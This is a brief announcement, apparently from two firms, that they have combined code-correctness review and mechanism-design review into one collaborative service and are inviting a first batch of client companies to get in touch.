After shadowing each other on a few trial projects, we found many of the mechanisms that we were assessing required a perspective that took both code correctness and mechanism design into account. From there, we worked together closely to understand each other’s processes, strategies, deliverables, and limitations. We collected feedback from past mutual clients, reviewed each other’s reports, sat in on each other’s calls, and built a collaborative process.

Now, we are excited to unveil what we have built to the public and work with a first batch of companies to prepare the systems they’re building for real-world usage. If you’re building something that could use this kind of review and guidance, get in touch. We’d love to work together with you.